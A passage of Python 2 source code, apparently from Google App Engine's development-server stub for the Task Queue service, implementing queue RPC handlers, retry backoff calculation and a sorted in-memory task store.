add_request.set_task_name(chosen_name)
task_results_with_chosen_names.add(id(task_result))
task_result.set_result(
taskqueue_service_pb.TaskQueueServiceError.SKIPPED)
else:
error_found = True
task_result.set_result(result)
if error_found:
return
if request.add_request(0).has_transaction():
self._TransactionalBulkAdd(request)
else:
self._NonTransactionalBulkAdd(request, response, now)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
if (task_result.result() ==
taskqueue_service_pb.TaskQueueServiceError.SKIPPED):
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if id(task_result) in task_results_with_chosen_names:
task_result.set_chosen_task_name(add_request.task_name())
def _TransactionalBulkAdd(self, request):
"""Uses datastore.AddActions to associate tasks with a transaction.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
assigned unique names.
"""
try:
apiproxy_stub_map.MakeSyncCall(
'datastore_v3', 'AddActions', request, api_base_pb.VoidProto())
except apiproxy_errors.ApplicationError, e:
raise apiproxy_errors.ApplicationError(
e.application_error +
taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR,
e.error_detail)
def _NonTransactionalBulkAdd(self, request, response, now):
"""Adds tasks to the appropriate _Queue instance.
Args:
request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the
tasks to add. N.B. all tasks in the request have been validated and
those with empty names have been assigned unique names.
response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate
with the results. N.B. the chosen_task_name field in the response will
not be filled-in.
now: A datetime.datetime object containing the current time in UTC.
"""
queue_mode = request.add_request(0).mode()
queue_name = request.add_request(0).queue_name()
store = self._queues[queue_name]
if store.queue_mode != queue_mode:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
for add_request, task_result in zip(request.add_request_list(),
response.taskresult_list()):
try:
store.Add(add_request, now)
except apiproxy_errors.ApplicationError, e:
task_result.set_result(e.application_error)
else:
task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK)
if (store.queue_mode == QUEUE_MODE.PUSH and
store.Oldest() == add_request.eta_usec()):
self._update_newest_eta(_UsecToSec(add_request.eta_usec()))
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
queue_name = request.queue_name()
response = self._ValidateQueueName(queue_name)
is_unknown_queue = (
response == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
if response != taskqueue_service_pb.TaskQueueServiceError.OK and (
not is_unknown_queue):
raise apiproxy_errors.ApplicationError(response)
if is_unknown_queue:
self._queues[queue_name] = _Queue(request.queue_name())
if self._app_id is not None:
self._queues[queue_name].Populate(random.randint(10, 100))
self._queues[queue_name].UpdateQueue_Rpc(request, response)
def FetchQueues_Rpc(self, request, response):
"""Implementation of the FetchQueues RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._ReloadQueuesFromYaml()
for queue_name in sorted(self._queues):
if response.queue_size() > request.max_rows():
break
if self._queues[queue_name] is None:
continue
self._queues[queue_name].FetchQueues_Rpc(request, response)
def FetchQueueStats_Rpc(self, request, response):
"""Implementation of the FetchQueueStats rpc which returns 'random' data.
This implementation loads some stats from the task store, the rest are
random numbers.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
for queue_name in request.queue_name_list():
stats = response.add_queuestats()
if queue_name not in self._queues:
stats.set_num_tasks(0)
stats.set_oldest_eta_usec(-1)
continue
store = self._queues[queue_name]
stats.set_num_tasks(store.Count())
if stats.num_tasks() == 0:
stats.set_oldest_eta_usec(-1)
else:
stats.set_oldest_eta_usec(store.Oldest())
if random.randint(0, 9) > 0:
scanner_info = stats.mutable_scanner_info()
scanner_info.set_executed_last_minute(random.randint(0, 10))
scanner_info.set_executed_last_hour(scanner_info.executed_last_minute()
+ random.randint(0, 100))
scanner_info.set_sampling_duration_seconds(random.random() * 10000.0)
scanner_info.set_requests_in_flight(random.randint(0, 10))
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryTasks_Rpc(request, response)
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._ReloadQueuesFromYaml()
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].FetchTask_Rpc(request, response)
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._ReloadQueuesFromYaml()
def _AddResultForAll(result):
for _ in request.task_name_list():
response.add_result(result)
if request.queue_name() not in self._queues:
_AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
elif self._queues[request.queue_name()] is None:
_AddResultForAll(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE)
else:
self._queues[request.queue_name()].Delete_Rpc(request, response)
def DeleteQueue_Rpc(self, request, response):
"""Implementation of the DeleteQueue RPC.
Tombstones the queue.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()] = None
def PauseQueue_Rpc(self, request, response):
"""Implementation of the PauseQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].paused = request.pause()
def PurgeQueue_Rpc(self, request, response):
"""Implementation of the PurgeQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].PurgeQueue()
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response)
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
"""
self._CheckQueueForRpc(request.queue_name())
self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response)
class Retry(object):
"""Task retry caclulator class.
Determines if and when a task should next be run
"""
_default_params = taskqueue_service_pb.TaskQueueRetryParameters()
def __init__(self, task, queue):
"""Constructor.
Args:
task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance.
May be None.
queue: A _Queue instance. May be None.
"""
if task is not None and task.has_retry_parameters():
self._params = task.retry_parameters()
elif queue is not None and queue.retry_parameters is not None:
self._params = queue.retry_parameters
else:
self._params = self._default_params
def CanRetry(self, retry_count, age_usec):
"""Computes whether a task can be retried.
Args:
retry_count: An integer specifying which retry this is.
age_usec: An integer specifying the microseconds since the first try.
Returns:
True if a task is eligible for retrying.
"""
if self._params.has_retry_limit() and self._params.has_age_limit_sec():
return (self._params.retry_limit() >= retry_count or
self._params.age_limit_sec() >= _UsecToSec(age_usec))
if self._params.has_retry_limit():
return self._params.retry_limit() >= retry_count
if self._params.has_age_limit_sec():
return self._params.age_limit_sec() >= _UsecToSec(age_usec)
return True
def CalculateBackoffUsec(self, retry_count):
"""Calculates time before the specified retry.
Args:
retry_count: An integer specifying which retry this is.
Returns:
The number of microseconds before a task should be retried.
"""
exponent = min(retry_count - 1, self._params.max_doublings())
linear_steps = retry_count - exponent
min_backoff_usec = _SecToUsec(self._params.min_backoff_sec())
max_backoff_usec = _SecToUsec(self._params.max_backoff_sec())
backoff_usec = min_backoff_usec
if exponent > 0:
backoff_usec *= (2 ** (min(1023, exponent)))
if linear_steps > 1:
backoff_usec *= linear_steps
return int(min(max_backoff_usec, backoff_usec))
class _Queue(object):
"""A Taskqueue Queue.
This class contains all of the properties of a queue and a sorted list of
tasks.
"""
def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT,
bucket_capacity=DEFAULT_BUCKET_SIZE,
user_specified_rate=DEFAULT_RATE, retry_parameters=None,
max_concurrent_requests=None, paused=False,
queue_mode=QUEUE_MODE.PUSH, acl=None,
_testing_validate_state=None, target=None):
self.queue_name = queue_name
self.bucket_refill_per_second = bucket_refill_per_second
self.bucket_capacity = bucket_capacity
self.user_specified_rate = user_specified_rate
self.retry_parameters = retry_parameters
self.max_concurrent_requests = max_concurrent_requests
self.paused = paused
self.queue_mode = queue_mode
self.acl = acl
self.target = target
self._testing_validate_state = _testing_validate_state
self.task_name_archive = set()
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
self._lock = threading.Lock()
def VerifyIndexes(self):
"""Ensures that all three indexes are in a valid state.
This method is used by internal tests and should not need to be called in
any other circumstances.
Raises:
AssertionError: if the indexes are not in a valid state.
"""
assert self._IsInOrder(self._sorted_by_name)
assert self._IsInOrder(self._sorted_by_eta)
assert self._IsInOrder(self._sorted_by_tag)
tasks_by_name = set()
tasks_with_tags = set()
for name, task in self._sorted_by_name:
assert name == task.task_name()
assert name not in tasks_by_name
tasks_by_name.add(name)
if task.has_tag():
tasks_with_tags.add(name)
tasks_by_eta = set()
for eta, name, task in self._sorted_by_eta:
assert name == task.task_name()
assert eta == task.eta_usec()
assert name not in tasks_by_eta
tasks_by_eta.add(name)
assert tasks_by_eta == tasks_by_name
tasks_by_tag = set()
for tag, eta, name, task in self._sorted_by_tag:
assert name == task.task_name()
assert eta == task.eta_usec()
assert task.has_tag() and task.tag()
assert tag == task.tag()
assert name not in tasks_by_tag
tasks_by_tag.add(name)
assert tasks_by_tag == tasks_with_tags
@staticmethod
def _IsInOrder(l):
"""Determine if the specified list is in ascending order.
Args:
l: The list to check
Returns:
True if the list is in order, False otherwise
"""
sorted_list = sorted(l)
return l == sorted_list
def _WithLock(f):
"""Runs the decorated function within self._lock.
Args:
f: The function to be delegated to. Must be a member function (take self
as the first parameter).
Returns:
The result of f.
"""
def _Inner(self, *args, **kwargs):
with self._lock:
ret = f(self, *args, **kwargs)
if self._testing_validate_state:
self.VerifyIndexes()
return ret
_Inner.__doc__ = f.__doc__
return _Inner
@_WithLock
def UpdateQueue_Rpc(self, request, response):
"""Implementation of the UpdateQueue RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
"""
assert request.queue_name() == self.queue_name
self.bucket_refill_per_second = request.bucket_refill_per_second()
self.bucket_capacity = request.bucket_capacity()
if request.has_user_specified_rate():
self.user_specified_rate = request.user_specified_rate()
else:
self.user_specified_rate = None
if request.has_retry_parameters():
self.retry_parameters = request.retry_parameters()
else:
self.retry_parameters = None
if request.has_max_concurrent_requests():
self.max_concurrent_requests = request.max_concurrent_requests()
else:
self.max_concurrent_requests = None
self.queue_mode = request.mode()
if request.has_acl():
self.acl = request.acl()
else:
self.acl = None
@_WithLock
def FetchQueues_Rpc(self, request, response):
"""Fills out a queue message on the provided TaskQueueFetchQueuesResponse.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
response_queue = response.add_queue()
response_queue.set_queue_name(self.queue_name)
response_queue.set_bucket_refill_per_second(
self.bucket_refill_per_second)
response_queue.set_bucket_capacity(self.bucket_capacity)
if self.user_specified_rate is not None:
response_queue.set_user_specified_rate(self.user_specified_rate)
if self.max_concurrent_requests is not None:
response_queue.set_max_concurrent_requests(
self.max_concurrent_requests)
if self.retry_parameters is not None:
response_queue.retry_parameters().CopyFrom(self.retry_parameters)
response_queue.set_paused(self.paused)
if self.queue_mode is not None:
response_queue.set_mode(self.queue_mode)
if self.acl is not None:
response_queue.mutable_acl().CopyFrom(self.acl)
@_WithLock
def QueryTasks_Rpc(self, request, response):
"""Implementation of the QueryTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
assert not request.has_start_tag()
if request.has_start_eta_usec():
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name(),
eta=request.start_eta_usec())
else:
tasks = self._LookupNoAcquireLock(request.max_rows(),
name=request.start_task_name())
for task in tasks:
response.add_task().MergeFrom(task)
@_WithLock
def FetchTask_Rpc(self, request, response):
"""Implementation of the FetchTask RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
task_name = request.task_name()
pos = self._LocateTaskByName(task_name)
if pos is None:
if task_name in self.task_name_archive:
error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
raise apiproxy_errors.ApplicationError(error)
_, task = self._sorted_by_name[pos]
response.mutable_task().add_task().CopyFrom(task)
@_WithLock
def Delete_Rpc(self, request, response):
"""Implementation of the Delete RPC.
Deletes tasks from the task store. We mimic a 1/20 chance of a
TRANSIENT_ERROR when the request has an app_id.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
for taskname in request.task_name_list():
if request.has_app_id() and random.random() <= 0.05:
response.add_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
else:
response.add_result(self._DeleteNoAcquireLock(taskname))
def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec,
tag=None):
assert self._lock.locked()
if group_by_tag and tag:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, None, None,),
end_key=(tag, now_eta_usec, None,),
max_rows=max_rows)
elif group_by_tag:
tasks = self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
if not tasks:
return []
if tasks[0].has_tag():
tag = tasks[0].tag()
return self._QueryAndOwnTasksGetTaskList(
max_rows, True, now_eta_usec, tag)
else:
return [task for task in tasks if not task.has_tag()]
else:
return self._IndexScan(self._sorted_by_eta,
start_key=(None, None,),
end_key=(now_eta_usec, None,),
max_rows=max_rows)
@_WithLock
def QueryAndOwnTasks_Rpc(self, request, response):
"""Implementation of the QueryAndOwnTasks RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
max_tasks = request.max_tasks()
if max_tasks <= 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
if request.has_tag() and not request.group_by_tag():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST,
'Tag specified, but group_by_tag was not.')
now_eta_usec = _SecToUsec(time.time())
tasks = self._QueryAndOwnTasksGetTaskList(
max_tasks, request.group_by_tag(), now_eta_usec, request.tag())
tasks_to_delete = []
for task in tasks:
retry = Retry(task, self)
if not retry.CanRetry(task.retry_count() + 1, 0):
logging.warning(
'Task %s in queue %s cannot be leased again after %d leases.',
task.task_name(), self.queue_name, task.retry_count())
tasks_to_delete.append(task)
continue
self._PostponeTaskNoAcquireLock(
task, now_eta_usec + _SecToUsec(lease_seconds))
task_response = response.add_task()
task_response.set_task_name(task.task_name())
task_response.set_eta_usec(task.eta_usec())
task_response.set_retry_count(task.retry_count())
if task.has_tag():
task_response.set_tag(task.tag())
task_response.set_body(task.body())
for task in tasks_to_delete:
self._DeleteNoAcquireLock(task.task_name())
@_WithLock
def ModifyTaskLease_Rpc(self, request, response):
"""Implementation of the ModifyTaskLease RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
"""
if self.queue_mode != QUEUE_MODE.PULL:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE)
if self.paused:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED)
lease_seconds = request.lease_seconds()
if lease_seconds < 0:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
pos = self._LocateTaskByName(request.task_name())
if pos is None:
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
_, task = self._sorted_by_name[pos]
if task.eta_usec() != request.eta_usec():
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
now_usec = _SecToUsec(time.time())
if task.eta_usec() < now_usec:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED)
future_eta_usec = now_usec + _SecToUsec(lease_seconds)
self._PostponeTaskNoAcquireLock(
task, future_eta_usec, increase_retries=False)
response.set_updated_eta_usec(future_eta_usec)
@_WithLock
def IncRetryCount(self, task_name):
"""Increment the retry count of a task by 1.
Args:
task_name: The name of the task to update.
"""
pos = self._LocateTaskByName(task_name)
assert pos is not None, (
'Task does not exist when trying to increase retry count.')
task = self._sorted_by_name[pos][1]
self._IncRetryCount(task)
def _IncRetryCount(self, task):
assert self._lock.locked()
retry_count = task.retry_count()
task.set_retry_count(retry_count + 1)
task.set_execution_count(task.execution_count() + 1)
@_WithLock
def GetTasksAsDicts(self):
"""Gets all of the tasks in this queue.
Returns:
A list of dictionaries, where each dictionary contains one task's
attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskExecutionCount': '1'),
('X-AppEngine-TaskRetryCount': '1'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('X-AppEngine-TaskPreviousResponse': '300'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
tasks = []
now = datetime.datetime.utcnow()
for _, _, task_response in self._sorted_by_eta:
tasks.append(QueryTasksResponseToDict(
self.queue_name, task_response, now))
return tasks
@_WithLock
def GetTaskAsDict(self, task_name):
"""Gets a specific task from this queue.
Returns:
A dictionary containing one task's attributes. E.g.
[{'name': 'task-123',
'queue_name': 'default',
'url': '/update',
'method': 'GET',
'eta': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'body': '',
'headers': [('user-header', 'some-value')
('X-AppEngine-QueueName': 'update-queue'),
('X-AppEngine-TaskName': 'task-123'),
('X-AppEngine-TaskExecutionCount': '1'),
('X-AppEngine-TaskRetryCount': '1'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('X-AppEngine-TaskPreviousResponse': '300'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
"""
task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name)
if not task_responses:
return
task_response, = task_responses
if task_response.task_name() != task_name:
return
now = datetime.datetime.utcnow()
return QueryTasksResponseToDict(self.queue_name, task_response, now)
@_WithLock
def PurgeQueue(self):
"""Removes all content from the queue."""
self._sorted_by_name = []
self._sorted_by_eta = []
self._sorted_by_tag = []
@_WithLock
def _GetTasks(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
return self._GetTasksNoAcquireLock()
def _GetTasksNoAcquireLock(self):
"""Helper method for tests returning all tasks sorted by eta.
Returns:
A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects
sorted by eta.
"""
assert self._lock.locked()
tasks = []
for eta, task_name, task in self._sorted_by_eta:
tasks.append(task)
return tasks
def _InsertTask(self, task):
"""Insert a task into the store, keeps lists sorted.
Args:
task: the new task.
"""
assert self._lock.locked()
eta = task.eta_usec()
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (eta, name, task))
if task.has_tag():
bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task))
bisect.insort_left(self._sorted_by_name, (name, task))
self.task_name_archive.add(name)
@_WithLock
def RunTaskNow(self, task):
"""Change the eta of a task to now.
Args:
task: The TaskQueueQueryTasksResponse_Task run now. This must be
stored in this queue (otherwise an AssertionError is raised).
"""
self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False)
@_WithLock
def PostponeTask(self, task, new_eta_usec):
"""Postpone the task to a future time and increment the retry count.
Args:
task: The TaskQueueQueryTasksResponse_Task to postpone. This must be
stored in this queue (otherwise an AssertionError is raised).
new_eta_usec: The new eta to set on the task. This must be greater then
the current eta on the task.
"""
assert new_eta_usec > task.eta_usec()
self._PostponeTaskNoAcquireLock(task, new_eta_usec)
def _PostponeTaskNoAcquireLock(self, task, new_eta_usec,
increase_retries=True):
assert self._lock.locked()
if increase_retries:
self._IncRetryCount(task)
name = task.task_name()
eta = task.eta_usec()
assert self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), task)
if task.has_tag():
assert self._RemoveTaskFromIndex(
self._sorted_by_tag, (task.tag(), eta, name, None), task)
self._PostponeTaskInsertOnly(task, new_eta_usec)
def _PostponeTaskInsertOnly(self, task, new_eta_usec):
assert self._lock.locked()
task.set_eta_usec(new_eta_usec)
name = task.task_name()
bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task))
if task.has_tag():
tag = task.tag()
bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task))
@_WithLock
def Lookup(self, maximum, name=None, eta=None):
"""Lookup a number of sorted tasks from the store.
If 'eta' is specified, the tasks are looked up in a list sorted by 'eta',
then 'name'. Otherwise they are sorted by 'name'. We need to be able to
sort by 'eta' and 'name' because tasks can have identical eta. If you had
20 tasks with the same ETA, you wouldn't be able to page past them, since
the 'next eta' would give the first one again. Names are unique, though.
Args:
maximum: the maximum number of tasks to return.
name: a task name to start with.
eta: an eta to start with.
Returns:
A list of up to 'maximum' tasks.
Raises:
ValueError: if the task store gets corrupted.
"""
return self._LookupNoAcquireLock(maximum, name, eta)
def _IndexScan(self, index, start_key, end_key=None, max_rows=None):
"""Return the result of a 'scan' over the given index.
The scan is inclusive of start_key and exclusive of end_key. It returns at
most max_rows from the index.
Args:
index: One of the index lists, eg self._sorted_by_tag.
start_key: The key to start at.
end_key: Optional end key.
max_rows: The maximum number of rows to yield.
Returns:
a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from
the given index, in sorted order.
"""
assert self._lock.locked()
start_pos = bisect.bisect_left(index, start_key)
end_pos = INF
if end_key is not None:
end_pos = bisect.bisect_left(index, end_key)
if max_rows is not None:
end_pos = min(end_pos, start_pos + max_rows)
end_pos = min(end_pos, len(index))
tasks = []
for pos in xrange(start_pos, end_pos):
tasks.append(index[pos][-1])
return tasks
def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None):
assert self._lock.locked()
if tag is not None:
return self._IndexScan(self._sorted_by_tag,
start_key=(tag, eta, name,),
end_key=('%s\x00' % tag, None, None,),
max_rows=maximum)
elif eta is not None:
return self._IndexScan(self._sorted_by_eta,
start_key=(eta, name,),
max_rows=maximum)
else:
return self._IndexScan(self._sorted_by_name,
start_key=(name,),
max_rows=maximum)
@_WithLock
def Count(self):
"""Returns the number of tasks in the store."""
return len(self._sorted_by_name)
@_WithLock
def OldestTask(self):
"""Returns the task with the oldest eta in the store."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][2]
return None
@_WithLock
def Oldest(self):
"""Returns the oldest eta in the store, or None if no tasks."""
if self._sorted_by_eta:
return self._sorted_by_eta[0][0]
return None
def _LocateTaskByName(self, task_name):
"""Locate the index of a task in _sorted_by_name list.
If the task does not exist in the list, return None.
Args:
task_name: Name of task to be located.
Returns:
Index of the task in _sorted_by_name list if task exists,
None otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(self._sorted_by_name, (task_name,))
if (pos >= len(self._sorted_by_name) or
self._sorted_by_name[pos][0] != task_name):
return None
return pos
@_WithLock
def Add(self, request, now):
"""Inserts a new task into the store.
Args:
request: A taskqueue_service_pb.TaskQueueAddRequest.
now: A datetime.datetime object containing the current time in UTC.
Raises:
apiproxy_errors.ApplicationError: If a task with the same name is already
in the store, or the task is tombstoned.
"""
if self._LocateTaskByName(request.task_name()) is not None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS)
if request.task_name() in self.task_name_archive:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK)
now_sec = calendar.timegm(now.utctimetuple())
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(request.task_name())
task.set_eta_usec(request.eta_usec())
task.set_creation_time_usec(_SecToUsec(now_sec))
task.set_retry_count(0)
task.set_method(request.method())
if request.has_url():
task.set_url(request.url())
for keyvalue in request.header_list():
header = task.add_header()
header.set_key(keyvalue.key())
header.set_value(keyvalue.value())
if request.has_description():
task.set_description(request.description())
if request.has_body():
task.set_body(request.body())
if request.has_crontimetable():
task.mutable_crontimetable().set_schedule(
request.crontimetable().schedule())
task.mutable_crontimetable().set_timezone(
request.crontimetable().timezone())
if request.has_retry_parameters():
task.mutable_retry_parameters().CopyFrom(request.retry_parameters())
if request.has_tag():
task.set_tag(request.tag())
self._InsertTask(task)
@_WithLock
def Delete(self, name):
"""Deletes a task from the store by name.
Args:
name: the name of the task to delete.
Returns:
TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown.
TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted.
TaskQueueServiceError.TOMBSTONED: if the task was deleted.
TaskQueueServiceError.OK: otherwise.
"""
return self._DeleteNoAcquireLock(name)
def _RemoveTaskFromIndex(self, index, index_tuple, task):
"""Remove a task from the specified index.
Args:
index: The index list that needs to be mutated.
index_tuple: The tuple to search for in the index.
task: The task instance that is expected to be stored at this location.
Returns:
True if the task was successfully removed from the index, False otherwise.
"""
assert self._lock.locked()
pos = bisect.bisect_left(index, index_tuple)
if index[pos][-1] is not task:
logging.debug('Expected %s, found %s', task, index[pos][-1])
return False
index.pop(pos)
return True
def _DeleteNoAcquireLock(self, name):
assert self._lock.locked()
pos = self._LocateTaskByName(name)
if pos is None:
if name in self.task_name_archive:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK
old_task = self._sorted_by_name.pop(pos)[-1]
eta = old_task.eta_usec()
if not self._RemoveTaskFromIndex(
self._sorted_by_eta, (eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
if old_task.has_tag():
tag = old_task.tag()
if not self._RemoveTaskFromIndex(
self._sorted_by_tag, (tag, eta, name, None), old_task):
return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERRROR
return taskqueue_service_pb.TaskQueueServiceError.OK
@_WithLock
def Populate(self, num_tasks):
"""Populates the store with a number of tasks.
Args:
num_tasks: the number of tasks to insert.
"""
def RandomTask():
"""Creates a new task and randomly populates values."""
assert self._lock.locked()
task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task()
task.set_task_name(''.join(random.choice(string.ascii_lowercase)
for x in range(20)))
task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10),
_SecToUsec(600)))
task.set_creation_time_usec(min(now_usec, task.eta_usec()) -
random.randint(0, _SecToUsec(20)))
task.set_url(random.choice(['/a', '/b', '/c', '/d']))
if random.random() < 0.2:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST)
task.set_body('A' * 2000)
else:
task.set_method(
taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET)
retry_count = max(0, random.randint(-10, 5))
task.set_retry_count(retry_count)
task.set_execution_count(retry_count)
if random.random() < 0.3:
random_headers = [('nexus', 'one'),
('foo', 'bar'),
('content-type', 'text/plain'),
('from', 'user@email.com')]
for _ in xrange(random.randint(1, 4)):
elem = random.randint(0, len(random_headers) - 1)
key, value = random_headers.pop(elem)
